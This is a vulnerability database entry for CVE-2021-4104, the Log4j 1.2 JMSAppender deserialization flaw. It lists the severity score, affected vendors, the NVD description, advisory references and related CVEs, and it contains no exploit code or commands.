CVE-2021-4104
7.5 HIGHJMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration
Published: 2021-12-14 · Last updated: 2026-05-28
Severity and scoring
- CVSS
- 7.5 HIGH
- Vector
- CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
- CWE
- CWE-502
Affected products
| Vendor | Product |
|---|---|
| apache | advanced_supply_chain_planning, business_intelligence, business_process_management_suite |
| fedoraproject | advanced_supply_chain_planning, business_intelligence, business_process_management_suite |
| oracle | advanced_supply_chain_planning, business_intelligence, business_process_management_suite |
| redhat | advanced_supply_chain_planning, business_intelligence, business_process_management_suite |
Description
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Source: NVD
References
- [NVD]https://nvd.nist.gov/vuln/detail/CVE-2021-4104
- [Other]http://www.openwall.com/lists/oss-security/2022/01/18/3
- [Other]https://access.redhat.com/security/cve/CVE-2021-4104
- [Other]https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
- [Other]https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
- [Other]https://security.gentoo.org/glsa/202209-02
- [Other]https://security.gentoo.org/glsa/202310-16
- [Other]https://security.gentoo.org/glsa/202312-02
- [Other]https://security.gentoo.org/glsa/202312-04
- [Other]https://security.netapp.com/advisory/ntap-20211223-0007/
- [Other]https://www.cve.org/CVERecord?id=CVE-2021-44228
- [Other]https://www.kb.cert.org/vuls/id/930724
- [Other]https://www.oracle.com/security-alerts/cpuapr2022.html
- [Other]https://www.oracle.com/security-alerts/cpujan2022.html
- [Other]https://www.oracle.com/security-alerts/cpujul2022.html
- [Other]http://www.openwall.com/lists/oss-security/2022/01/18/3
- [Other]https://access.redhat.com/security/cve/CVE-2021-4104
- [Other]https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
- [Other]https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
- [Other]https://security.gentoo.org/glsa/202209-02
- [Other]https://security.gentoo.org/glsa/202310-16
- [Other]https://security.gentoo.org/glsa/202312-02
- [Other]https://security.gentoo.org/glsa/202312-04
- [Other]https://security.netapp.com/advisory/ntap-20211223-0007/
- [Other]https://www.cve.org/CVERecord?id=CVE-2021-44228
- [Other]https://www.kb.cert.org/vuls/id/930724
- [Other]https://www.oracle.com/security-alerts/cpuapr2022.html
- [Other]https://www.oracle.com/security-alerts/cpujan2022.html
- [Other]https://www.oracle.com/security-alerts/cpujul2022.html
Related CVEs
Same vendor
- CVE-2026-1767 — A flaw was found in the GNOME localsearch (previously known as tracker-miners) MP3 Extractor `tracker-extract-mp3` component (5.6 MEDIUM)
- CVE-2026-1766 — A flaw was found in GNOME localsearch (previously known as tracker-miners) MP3 Extractor, specifically within the tracker-extract-mp3 com... (5.6 MEDIUM)
- CVE-2026-50645 — There is no restriction on the amount of attachment headers that a message can contain when being deserialized by Apache CXF, which can l... (7.5 HIGH)
- CVE-2026-50634 — A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be exploited to cause CXF to process metadata that was not authenticate... (6.5 MEDIUM)
- CVE-2026-50633 — A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an atta... (8.1 HIGH)
Same CWE
- CVE-2026-48775 — LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite) (6.8 MEDIUM)
- CVE-2026-10748 — An authenticated user with the nx-licensing-create privilege can upload a specially crafted license file to execute arbitrary operating s...
- CVE-2026-24228 — NVIDIA NeMo Framework for Linux contains a vulnerability where an attacker may cause deserialization of untrusted data (7.8 HIGH)
- CVE-2026-48853 — Deserialization of Untrusted Data and Allocation of Resources Without Limits or Throttling vulnerabilities in elixir-grpc grpc allow unau...
- CVE-2026-9691 — Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.1 versions (9.8 CRITICAL)